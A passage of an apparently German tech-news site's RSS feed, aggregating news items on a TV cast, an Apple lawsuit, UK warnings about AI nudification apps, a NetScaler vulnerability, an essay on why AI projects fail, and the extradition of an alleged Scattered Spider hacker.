Shane McRae as Knox



Remmie Milner as Shirley



Alexandria Riley as Camille Sims 




Wrap Up



The new cast gives Silo Season 3 a much larger scope than previous seasons. With fresh characters exploring the origins of the silos and returning favorites dealing with the present-day crisis, the series promises to answer long-standing questions while setting up its already confirmed fourth and final season.]]></content:encoded>
</item>
<item>
<title><![CDATA[Jon Prosser responds to Apple lawsuit by blaming the other guy]]></title>
<description><![CDATA[YouTuber Jon Prosser has finally filed a formal response to Apple's lawsuit made against him and another defendant over allegedly stealing iOS secrets. In his response, Prosser denied that he "planned or participated in any conspiracy or coordinated scheme" for the "purpose of injuring Apple." Ho...]]></description>
<link>https://tsecurity.de/de/3643640/it-nachrichten/jon-prosser-responds-to-apple-lawsuit-by-blaming-the-other-guy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643640/it-nachrichten/jon-prosser-responds-to-apple-lawsuit-by-blaming-the-other-guy/</guid>
<pubDate>Fri, 03 Jul 2026 15:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YouTuber Jon Prosser has finally filed a formal response to Apple's lawsuit made against him and another defendant over allegedly stealing iOS secrets. In his response, Prosser denied that he "planned or participated in any conspiracy or coordinated scheme" for the "purpose of injuring Apple." However, Prosser admitted to recording a FaceTime call showing unreleased […]]]></content:encoded>
</item>
<item>
<title><![CDATA[UK parents warned over posting images of children amid AI sexual abuse fears]]></title>
<description><![CDATA[Exclusive: National Crime Agency and safety watchdog issue guidance amid rise in explicit material onlineAnalysis | AI prey: why watchdogs are telling parents to protect children from nudification appsThe UK National Crime Agency has recommended parents should not put photos of their children on ...]]></description>
<link>https://tsecurity.de/de/3643475/ai-nachrichten/uk-parents-warned-over-posting-images-of-children-amid-ai-sexual-abuse-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643475/ai-nachrichten/uk-parents-warned-over-posting-images-of-children-amid-ai-sexual-abuse-fears/</guid>
<pubDate>Fri, 03 Jul 2026 14:04:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Exclusive: National Crime Agency and safety watchdog issue guidance amid rise in explicit material online</p><ul><li><p><a href="https://www.theguardian.com/society/2026/jul/03/ai-prey-watchdogs-telling-parents-protect-children-nudification-apps">Analysis | AI prey: why watchdogs are telling parents to protect children from nudification apps</a></p></li></ul><p>The UK National Crime Agency has recommended parents should not put photos of their children on public display online as part of landmark guidance to tackle the rise of AI-generated sexual abuse material.</p><p>Advice issued by the NCA and the child safety watchdog the Internet Watch Foundation suggests parents and guardians make their social media accounts private or share pictures of their children through a “close friends” group.</p> <a href="https://www.theguardian.com/society/2026/jul/03/ai-sexual-abuse-fears-uk-parents-warned-posting-images-children-national-crime-agency">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI prey: why watchdogs are telling parents to protect children from nudification apps]]></title>
<description><![CDATA[As imaging tools become more sophisticated, online predators are using images of children to make extreme pornographyUK parents warned over posting images of children amid AI sexual abuse fearsThe two photos started out as typical teenage selfies: looking into the mirror, fully clothed. But once ...]]></description>
<link>https://tsecurity.de/de/3643474/ai-nachrichten/ai-prey-why-watchdogs-are-telling-parents-to-protect-children-from-nudification-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643474/ai-nachrichten/ai-prey-why-watchdogs-are-telling-parents-to-protect-children-from-nudification-apps/</guid>
<pubDate>Fri, 03 Jul 2026 14:04:16 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As imaging tools become more sophisticated, online predators are using images of children to make extreme pornography</p><ul><li><p><a href="https://www.theguardian.com/society/2026/jul/03/ai-sexual-abuse-fears-uk-parents-warned-posting-images-children-national-crime-agency">UK parents warned over posting images of children amid AI sexual abuse fears</a></p></li></ul><p>The two photos started out as typical teenage selfies: looking into the mirror, fully clothed. But once online predators had got hold of those pictures and ran them through an AI imaging tool, they had become the basis for extreme pornography videos.</p><p>These examples come from the <a href="https://www.childline.org.uk/info-advice/bullying-abuse-safety/online-mobile-safety/report-remove/">Report Remove</a> service, which allows children who have had explicit pictures of themselves distributed without their consent to flag the image confidentially and have it blocked or taken down from social media. Due to breakthroughs in AI, and the wide availability of AI models and <a href="https://www.theguardian.com/technology/2025/apr/28/what-are-nudification-apps-how-would-uk-ban-work">nudification apps</a>, some under-18s are becoming victims without even being in contact with criminals.</p> <a href="https://www.theguardian.com/society/2026/jul/03/ai-prey-watchdogs-telling-parents-protect-children-nudification-apps">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lisa Nandy quits X over fears Musk-owned site pushes ‘abuse and misinformation’]]></title>
<description><![CDATA[Culture secretary says her department will stop using platform, citing concerns over far-right content fuelling violence and divisionThe UK’s culture and media department will stop using X because the site “now favours abuse and misinformation over meaningful debate”, Lisa Nandy has announced.The...]]></description>
<link>https://tsecurity.de/de/3642922/it-nachrichten/lisa-nandy-quits-x-over-fears-musk-owned-site-pushes-abuse-and-misinformation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642922/it-nachrichten/lisa-nandy-quits-x-over-fears-musk-owned-site-pushes-abuse-and-misinformation/</guid>
<pubDate>Fri, 03 Jul 2026 09:32:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Culture secretary says her department will stop using platform, citing concerns over far-right content fuelling violence and division</p><p>The UK’s culture and media department will stop using X because the site “now favours abuse and misinformation over meaningful debate”, Lisa Nandy has announced.</p><p>The culture secretary’s department is the UK’s second to quit the Elon Musk-owned platform over increasing concerns about the way it highlights and prioritises often inaccurate far-right and racist content and is used to incite violence and division.</p> <a href="https://www.theguardian.com/media/2026/jul/02/lisa-nandy-culture-social-media-x-abuse-misinformation">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-02 15h : 13 posts]]></title>
<description><![CDATA[13 posts were published in the last hour 12:37 : NetScaler Memory Overread Flaw Revives CitrixBleed Fears 12:37 : Cursor IDE Vulnerabilities Let Prompt Injection Escape the Sandbox 12:36 : Cloudflare changes AI crawler access rules 12:36 : Identity Lifecycle…
Read more →
The post IT Security News...]]></description>
<link>https://tsecurity.de/de/3641308/it-security-nachrichten/it-security-news-hourly-summary-2026-07-02-15h-13-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641308/it-security-nachrichten/it-security-news-hourly-summary-2026-07-02-15h-13-posts/</guid>
<pubDate>Thu, 02 Jul 2026 15:23:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>13 posts were published in the last hour 12:37 : NetScaler Memory Overread Flaw Revives CitrixBleed Fears 12:37 : Cursor IDE Vulnerabilities Let Prompt Injection Escape the Sandbox 12:36 : Cloudflare changes AI crawler access rules 12:36 : Identity Lifecycle…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-02-15h-13-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-02-15h-13-posts/">IT Security News Hourly Summary 2026-07-02 15h : 13 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetScaler Memory Overread Flaw Revives CitrixBleed Fears]]></title>
<description><![CDATA[Citrix has patched a pre-auth NetScaler memory overread bug, CVE-2026-8451, that echoes the 2023 CitrixBleed flaw and was found while researchers dissected an earlier Citrix bug.
NetScaler Memory Overread Flaw Revives CitrixBleed Fears on Latest Hacking News | Cyber Security News, Hacking Tools a...]]></description>
<link>https://tsecurity.de/de/3641182/it-security-nachrichten/netscaler-memory-overread-flaw-revives-citrixbleed-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641182/it-security-nachrichten/netscaler-memory-overread-flaw-revives-citrixbleed-fears/</guid>
<pubDate>Thu, 02 Jul 2026 14:40:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Citrix has patched a pre-auth NetScaler memory overread bug, CVE-2026-8451, that echoes the 2023 CitrixBleed flaw and was found while researchers dissected an earlier Citrix bug.</p>
<p><a href="https://latesthackingnews.com/2026/07/02/netscaler-memory-overread-citrixbleed/">NetScaler Memory Overread Flaw Revives CitrixBleed Fears</a> on <a href="https://latesthackingnews.com/">Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetScaler Memory Overread Flaw Revives CitrixBleed Fears]]></title>
<description><![CDATA[Citrix has patched a pre-auth NetScaler memory overread bug, CVE-2026-8451, that echoes the 2023 CitrixBleed flaw and was found while researchers dissected an earlier Citrix bug. NetScaler Memory Overread Flaw Revives CitrixBleed Fears on Latest Hacking News | Cyber Security…
Read more →
The post...]]></description>
<link>https://tsecurity.de/de/3641165/it-security-nachrichten/netscaler-memory-overread-flaw-revives-citrixbleed-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641165/it-security-nachrichten/netscaler-memory-overread-flaw-revives-citrixbleed-fears/</guid>
<pubDate>Thu, 02 Jul 2026 14:40:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Citrix has patched a pre-auth NetScaler memory overread bug, CVE-2026-8451, that echoes the 2023 CitrixBleed flaw and was found while researchers dissected an earlier Citrix bug. NetScaler Memory Overread Flaw Revives CitrixBleed Fears on Latest Hacking News | Cyber Security…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/netscaler-memory-overread-flaw-revives-citrixbleed-fears/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/netscaler-memory-overread-flaw-revives-citrixbleed-fears/">NetScaler Memory Overread Flaw Revives CitrixBleed Fears</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[India gives WhatsApp three days to defend username rollout amid security fears]]></title>
<description><![CDATA[Government of the messenger’s largest market demands a pause while Meta explains how it plans to stop impersonators This article has been indexed from www.theregister.com – Articles Read the original article: India gives WhatsApp three days to defend username rollout…
Read more →
The post India g...]]></description>
<link>https://tsecurity.de/de/3641118/it-security-nachrichten/india-gives-whatsapp-three-days-to-defend-username-rollout-amid-security-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641118/it-security-nachrichten/india-gives-whatsapp-three-days-to-defend-username-rollout-amid-security-fears/</guid>
<pubDate>Thu, 02 Jul 2026 14:23:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Government of the messenger’s largest market demands a pause while Meta explains how it plans to stop impersonators This article has been indexed from www.theregister.com – Articles Read the original article: India gives WhatsApp three days to defend username rollout…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/india-gives-whatsapp-three-days-to-defend-username-rollout-amid-security-fears/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/india-gives-whatsapp-three-days-to-defend-username-rollout-amid-security-fears/">India gives WhatsApp three days to defend username rollout amid security fears</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[India gives WhatsApp three days to defend username rollout amid security fears]]></title>
<description><![CDATA[Government of the messenger's largest market demands a pause while Meta explains how it plans to stop impersonators]]></description>
<link>https://tsecurity.de/de/3641065/it-security-nachrichten/india-gives-whatsapp-three-days-to-defend-username-rollout-amid-security-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641065/it-security-nachrichten/india-gives-whatsapp-three-days-to-defend-username-rollout-amid-security-fears/</guid>
<pubDate>Thu, 02 Jul 2026 14:09:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Government of the messenger's largest market demands a pause while Meta explains how it plans to stop impersonators]]></content:encoded>
</item>
<item>
<title><![CDATA[4 reasons AI projects fail that have nothing to do with technology]]></title>
<description><![CDATA[Having worked with dozens of companies in various stages of AI adoption, I’ve had a front-row seat to the myriad reasons (and sometimes excuses) why AI projects fail to launch, fail to make it past pilots or fail to deliver business value and ROI.



While every organization’s circumstances are u...]]></description>
<link>https://tsecurity.de/de/3640730/it-nachrichten/4-reasons-ai-projects-fail-that-have-nothing-to-do-with-technology/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640730/it-nachrichten/4-reasons-ai-projects-fail-that-have-nothing-to-do-with-technology/</guid>
<pubDate>Thu, 02 Jul 2026 12:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Having worked with dozens of companies in various stages of AI adoption, I’ve had a front-row seat to the myriad reasons (and sometimes excuses) why AI projects fail to launch, fail to make it past pilots or <a href="https://complexdiscovery.com/why-95-of-corporate-ai-projects-fail-lessons-from-mits-2025-study/" rel="nofollow">fail to deliver</a> business value and ROI.</p>



<p>While every organization’s circumstances are unique, the root causes are often surprisingly familiar. Like so many technological leaps that came before AI, fear, culture and competing priorities are often the biggest barriers to enterprise success.</p>



<h2 class="wp-block-heading">1. Fear of job replacement</h2>



<p>It’s no secret that employees across industries, roles and seniority levels can see the writing on the wall: AI will affect their careers. According to <a href="https://www.pewresearch.org/social-trends/2025/02/25/u-s-workers-are-more-worried-than-hopeful-about-future-ai-use-in-the-workplace/?utm_source=chatgpt.com">Pew Research</a>, 52% of workers are concerned about AI’s future impact on the workplace, and 32% believe it will reduce job opportunities in the long run.</p>



<p>As a result, there may be resistance, or just a lack of enthusiasm, to AI initiatives. This can cause AI success to stall in the form of slow adoption, low engagement and knowledge hoarding. One <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">Writer study</a> even found that 29% of employees (and 44% of Gen Z) admit to sabotaging their employer’s AI strategy.</p>



<p>There is a common refrain, and new <a href="https://www.gartner.com/en/newsroom/press-releases/2026-05-13-gartner-hr-research-reveals-ai-will-create-more-jobs-than-it-eliminates-beginning-in-2028" rel="nofollow">research from Gartner</a> to boot, that beginning in 2028, AI will create more jobs than it eliminates. Even so, such assurances can ring hollow to employees. The bitter pill for tech leaders to swallow is that there is little certainty that the jobs to be created will be well-paid or accessible to workers whose roles were eliminated.</p>



<p>Tech leaders are often surrounded by high performers, innovators and professionals who naturally view change as an opportunity. In these environments, it’s easy to overlook that many workers experience transformation differently—and would prefer predictability over a disruption to their routine or simply don’t have the bandwidth to pivot.</p>



<p>Take secretarial work, which was once a well-compensated role, especially for women without an advanced degree. Technology—namely computers, email, software and virtual assistants—enabled the reduction in demand for these professionals, not overnight but over the course of several decades. More than 2.1 million administrative and office support jobs have disappeared in the U.S. since 2000, according to Labor Department data. While there are many professionals who upskilled or changed careers, <a href="https://www.washingtonpost.com/business/economy/administrative-assistant-jobs-helped-propel-many-women-into-the-middle-class-now-theyre-disappearing/2019/12/04/75686efe-f6a0-11e9-a285-882a8e386a96_story.html" rel="nofollow">The Washington Post</a> reports that middle-aged and older workers have had a hard time finding work within their skill set with similar pay and benefits.</p>



<p>On the other end of the spectrum, AI is empowering many employees to lift the ceiling on their potential by expanding what we can do and who can contribute high-value work. A rising tide may lift all boats, but those who Microsoft dubs “Frontier Professionals,” who are the most advanced AI users, are most likely to benefit from new job opportunities created by AI. The <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">Writer</a> study shows that 92% of the C-suite are actively cultivating “AI elite” employees, while 60% plan layoffs for non-adopters.</p>



<p>No leader can promise what the labor market will look like a decade from now. What they can do is provide clarity about the next six months to two years. Moreover, supporting employees with tools that help them prepare for the future is more valuable than trying to offer certainty about the future.</p>



<p>Provide a transparent roadmap for your organization’s AI implementation goals. Acknowledge the fear, but also the possibility, and help employees process the changes they are living through by providing access to information, continuing education, <a href="https://www.cio.com/article/4165040/you-cant-train-your-way-out-of-the-ai-skills-gap.html">redesigned workflows</a> and sandbox environments for AI learning and experimentation. The exact way your organization approaches the fear of job replacement will depend on the nature of your industry and its professionals. Some roles will change dramatically in a few years, while others may change slowly over decades, as secretarial roles did.</p>



<p>Ironically, despite fears of job displacement, AI workforce impact remains low, according to <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html" rel="nofollow">The State of AI in the Enterprise Report</a>. The most immediate barrier to AI adoption is often the opposite: a shortage of AI skills and systems. </p>



<h2 class="wp-block-heading">2. Lack of AI-first culture</h2>



<p>Many organizations purchase AI technology without redesigning current business processes and workflows around it, which can lead to failed adoption. AI adoption is less like a software rollout and more like an organizational transformation initiative that requires “cultural openness” to a process or workflow reset.</p>



<p>Despite the anxiety around AI at work, the <a href="https://www.microsoft.com/en-us/worklab/work-trend-index/agents-human-agency-and-the-opportunity-for-every-organization" rel="nofollow">Microsoft Work Trend Index Annual Report</a> found that “In many cases, people are ready. The systems around them are not.” The research shows that 65% of AI users fear falling behind if they don’t adapt fast. Yet 45% say it feels safer to stick with current goals than to redesign work with AI—and only 13% are rewarded for reinventing how they work, even when results fall short. This demonstrates a paradox where organizational metrics, incentives and norms keep employees anchored to the past way of doing things.</p>



<p>There is no universal blueprint for an AI-first culture. What it looks like will vary by organization, industry and workforce, and it will continue to evolve as AI capabilities mature. But a common thread is prioritizing a growth mindset. As Microsoft Chief People Officer Amy Coleman and WSJ Leadership Institute President Alan Murray discussed in a recent <a href="https://www.wsj.com/video/building-an-aifirst-humancentered-culture/3AE514C2-CEF0-4A13-8ADF-9ED06E86AB84" rel="nofollow">interview</a>, “Stop being a know-it-all company and start being a learn-it-all company.” That means encouraging experimentation despite imperfect conditions, permitting employees to fail, rewarding those who succeed, and ensuring leaders model the behaviors they want to see.</p>



<p>Learning and development alone are not enough. An AI-first culture must also prioritize strong <a href="https://www.cio.com/article/4136833/its-not-your-ai-thats-failing-its-your-data.html">data foundations</a> and workflows, which may be one of the most challenging barriers to overcome. <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html" rel="nofollow">The State of AI in the Enterprise Report</a> found that although 42% of companies surveyed believe their strategy is highly prepared for AI adoption, they feel less prepared in terms of infrastructure, data, risk and talent.</p>



<p>For leaders who view culture as a secondary concern, the numbers tell a different story. The Microsoft report revealed 67% of AI impact comes from culture, manager support and talent practices, which is more than double the 32% tied to individual mindset and behavior.</p>



<h2 class="wp-block-heading">3. Competing priorities and misaligned incentives</h2>



<p>One of the least discussed reasons AI projects fail is that different stakeholders are optimizing for fundamentally different definitions of success. Consider an ITSM AI initiative: the CIO is tasked with reducing technology costs, the service desk wants faster ticket resolution, builders want scalable systems and the legal department is concerned about compliance and liability. Each group may support the project in principle, but they are measuring success through entirely different lenses.</p>



<p>Without alignment on a shared business objective, teams might struggle to balance the inevitable trade-offs AI projects require. Teams optimize for their own priorities rather than a common outcome, resulting in slower decisions, competing incentives and a lack of ROI. They might also be working off of incentive structures that reward the old way of doing things. For example, if an IT team is rewarded based on tickets resolved, there is little incentive to drive down ticket volume in the first place.</p>



<p>In some organizations, the problem runs even deeper. Rather than optimizing for a business outcome, they’re optimizing for appearances. <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">75%</a> of executives acknowledge their company’s AI strategy is more performative than practical—existing primarily to signal innovation rather than to provide meaningful business results. Much like offices that touted high-end photocopiers in the 1980s that nobody knew how to use, investments in this vein can end up costing way more than they’re worth.</p>



<p>Unlike underutilized photocopiers, the stakes of failing at AI adoption are high. Though the underlying challenges are nothing new, what is new is the scale of AI’s impact and the risk of falling behind competitors that get it right. (Yes, I recognize the irony of referencing photocopier technology while writing about AI.)</p>



<h2 class="wp-block-heading">4. Excuses</h2>



<p>When explaining why AI projects stall, there are sometimes excuses:</p>



<ul class="wp-block-list">
<li>The vendor overpromised</li>



<li>We chose the wrong model</li>



<li>The technology wasn’t mature enough</li>



<li>Compliance and legal slowed us down</li>



<li>We didn’t have the right talent</li>



<li>The market changed</li>
</ul>



<p>These concerns are valid but rarely insurmountable. Nearly every successful AI program has had to navigate some combination of imperfect circumstances. It’s important to treat these challenges as hurdles, not dead ends, and find ways around them by having a growth mindset culture and bringing in expertise where needed.</p>



<p>I’ve yet to see a project fail because leaders cared too much about communication, culture, alignment or commitment over the long-term. More often, the opposite is true. AI may be one of the most significant technological shifts of our lifetime, but success still depends on fundamentals: strong leadership, adaptable culture, clear objectives and a willingness to act.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scattered Spider Hacker Arrested in Finland and Extradited to U.S. Over Cyber Intrusion Charges]]></title>
<description><![CDATA[U.S. authorities have announced federal charges against an alleged member of the notorious cybercriminal group Scattered Spider, following his arrest in Finland and extradition to the United States. The defendant, identified as 19-year-old Peter Stokes, a dual national of the U.S. and Estonia, is...]]></description>
<link>https://tsecurity.de/de/3640167/it-security-nachrichten/scattered-spider-hacker-arrested-in-finland-and-extradited-to-us-over-cyber-intrusion-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640167/it-security-nachrichten/scattered-spider-hacker-arrested-in-finland-and-extradited-to-us-over-cyber-intrusion-charges/</guid>
<pubDate>Thu, 02 Jul 2026 07:09:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>U.S. authorities have announced federal charges against an alleged member of the notorious cybercriminal group Scattered Spider, following his arrest in Finland and extradition to the United States. The defendant, identified as 19-year-old Peter Stokes, a dual national of the U.S. and Estonia, is accused of participating in a widespread conspiracy involving cyber intrusions and […]</p>
<p>The post <a href="https://gbhackers.com/scattered-spider-hacker-arrested-in-finland/">Scattered Spider Hacker Arrested in Finland and Extradited to U.S. Over Cyber Intrusion Charges</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alleged Scattered Spider Member Arrested in Finland, Extradited to U.S.]]></title>
<description><![CDATA[An alleged member of the Scattered Spider cybercrime group has been extradited from Finland to the United States to face federal charges related to conspiracy, cyber intrusion, and fraud. U.S. authorities said the case marks another step in their ongoing efforts to prosecute individuals accused o...]]></description>
<link>https://tsecurity.de/de/3640162/it-security-nachrichten/alleged-scattered-spider-member-arrested-in-finland-extradited-to-us/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640162/it-security-nachrichten/alleged-scattered-spider-member-arrested-in-finland-extradited-to-us/</guid>
<pubDate>Thu, 02 Jul 2026 07:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Scattered Spider" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Alleged Scattered Spider Member Arrested in Finland, Extradited to U.S. 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="370" data-end="763">An alleged member of the <a href="https://thecyberexpress.com/?s=Scattered+Spider" target="_blank" rel="noopener">Scattered Spider </a>cybercrime group has been extradited from Finland to the United States to face federal charges related to conspiracy, cyber intrusion, and fraud. U.S. authorities said the case marks another step in their ongoing efforts to prosecute individuals accused of participating in high-profile cybercrime operations linked to the notorious hacking group.</p>
<p data-start="765" data-end="1255">Peter Stokes, 19, a dual U.S. and Estonian citizen, made his initial appearance in federal court in Chicago after being extradited from Finland.</p>
<p data-start="765" data-end="1255">According to the <a href="https://thecyberexpress.com/justice-department-seizes-heartsender-websites/" target="_blank" rel="noopener">U.S. Department of Justice</a>, Stokes was arrested by Finnish authorities in April following an Interpol Red Notice and was transferred to the United States last week. A criminal complaint filed in the Northern District of Illinois accuses him of participating in cyberattacks carried out as part of the Scattered Spider group.</p>

<h3 data-section-id="vaw638" data-start="1257" data-end="1323"><strong><span role="text">Scattered Spider Linked to More Than 100 Network Intrusions</span></strong></h3>
<p data-start="1325" data-end="1646">According to the <a href="https://www.justice.gov/usao-ndil/media/1450651/dl?inline" target="_blank" rel="nofollow noopener">complaint</a>, Scattered Spider, also known as Octo Tempest, UNC3944, and 0ktapus, has been associated with more than 100 network intrusions. Authorities allege the group's activities have resulted in over $100 million in ransom payments and millions of dollars in additional damages suffered by victims.</p>
<p data-start="1648" data-end="2020">Investigators said the group targeted companies across the United States by obtaining access to employee accounts through fraudulent methods.</p>
<p data-start="1648" data-end="2020">Once inside corporate networks, the attackers allegedly encrypted <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28891">data</a> or exfiltrated sensitive information to remote servers before demanding cryptocurrency payments to restore access or prevent the public release of stolen data.</p>

<h3 data-section-id="1il9mbm" data-start="2022" data-end="2082"><span role="text"><strong data-start="2025" data-end="2082">Complaint Details Alleged Luxury Retailer Cyberattack</strong></span></h3>
<p data-start="2084" data-end="2206">The criminal complaint describes an alleged <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28893">cyber</a> intrusion that occurred in May 2025 involving a luxury jewelry retailer.</p>
<p data-start="2208" data-end="2558">Federal prosecutors allege that Stokes and other co-conspirators breached the retailer's computer systems, exfiltrated company data, and demanded approximately $8 million in cryptocurrency as ransom. According to <a href="https://www.justice.gov/usao-ndil/pr/alleged-member-criminal-cyber-hacking-group-scattered-spider-arrested-finland-and" target="_blank" rel="nofollow noopener">court documents</a>, the retailer's security team successfully removed the threat actors from its network before any ransom payment was made.</p>
<p data-start="2560" data-end="2765">Although the company did not pay the ransom, authorities said it still incurred losses of at least $2 million due to business disruption, investigation costs, and mitigation efforts following the incident.</p>

<h3 data-section-id="4n7c6v" data-start="2767" data-end="2819"><strong><span role="text">Operation Riptide Targets Cybercrime Networks</span></strong></h3>
<p data-start="2821" data-end="3204">The extradition and criminal charges were announced by the Department of Justice, the U.S. Attorney's Office for the Northern District of Illinois, and the FBI. The investigation also involved the FBI's Copenhagen Law Enforcement Attaché Office, the <a href="https://thecyberexpress.com/fbi-warns-of-malicious-traffic/" target="_blank" rel="noopener">FBI</a> Las Vegas Field Office, the Justice Department's Office of International Affairs, and Finland's National Bureau of Investigation.</p>
<p data-start="3206" data-end="3409">Officials said the case forms part of Operation Riptide, an ongoing FBI campaign focused on disrupting cybercriminal actors, infrastructure, financial networks, and <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28890">fraud</a> schemes targeting Americans.</p>
<p data-start="3411" data-end="3566">According to the FBI, Americans reported more than $20 billion in <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28889">cybercrime</a> losses last year, representing a 26% increase compared with the previous year.</p>

<h3 data-section-id="1bg9rey" data-start="3568" data-end="3617"><strong><span role="text">Authorities Cite International Cooperation</span></strong></h3>
<p data-start="3619" data-end="3903">Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28894">General</a> A. Tysen Duva said the charges stem from years of investigative work by the Justice Department, the U.S. Attorney's Office, and the FBI, adding that authorities would continue working together to pursue cybercriminals operating across international borders.</p>
